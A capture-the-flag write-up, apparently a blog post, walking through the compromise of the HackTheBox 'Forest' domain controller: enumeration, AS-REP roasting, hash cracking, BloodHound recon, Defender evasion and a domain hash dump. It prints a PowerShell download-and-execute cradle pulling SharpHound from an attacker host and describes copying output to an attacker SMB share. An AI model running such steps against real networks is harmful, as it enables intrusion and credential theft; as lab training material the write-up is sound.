HackTheBox Forest

HackTheBox Forest

·

2 min read

Easy windows box (more like medium)

Starting off with Nmap

image.png

From the output, we can tell that there is a domain controller being hosted here as well as smb.

SMB Enumeration:

smbmap

image.png

Unable to access smb shares also tried with null authentication (fake user/pass)

trying with smbclient

image.png

no luck either but we see that anonymous access is supported

enum4linux

image.png

no luck here

RPC enumeration

connecting with null auth

image.png

Creating a list of useable usernames

image.png

cleaning out the output

image.png

as-rep roasting

using a simple for loop we can automate going through the user list and then we finally get a hit on an svc account(as-rep roasting)

image.png

image.png

Hash Cracking

we can now use hashcat to crack the hash

image.png

we got the password

image.png

we can then use evil-winrm to get access the machine as a user and cat the user flag

image.png

Privilege escalation

To get a better understanding of what's going on I deployed sharp sound which is a PowerShell script part of the bloodhound repo to do a bunch of automated PowerShell queries for recon.

Firstly I started a local webserver and then downloaded my PowerShell script using iex

ex(new-object net.webclient).downloadstring("http://10.10.14.6/SharpHound.ps1")

Then I invoked the script with valid credentials so the queries could be made:

image.png

We are then left with the issue of exfil our output back to us.

image.png

Data Exfiltration

Using impackets smbserver i started a smb server to try and exfil my output too

thank you to 0xdf writeup for this

image.png

Inside of my evil-winrm shell I authenticated to my smbserver

image.png

I then copied my output file to the share

image.png

Clean up:

Delete output file

del 0220807041638_BloodHound.zip

Delete share

net use /d \\10.10.14.10\share

BloodHound

Investigating the output with bloodhound gui

image.png

After uploading the data I filtered for my compromised account to the shortest path to high valuable targets;

image.png

Viewing the help option in bloodhound

image.png

Creating my user and adding it the right groups

image.png

Evade defender and download powerview

image.png

Add-ObjectACL

image.png

Dump NTLM hashes for all domain users

image.png

psexec using Admin account NTLM hash

image.png

print root flag

image.png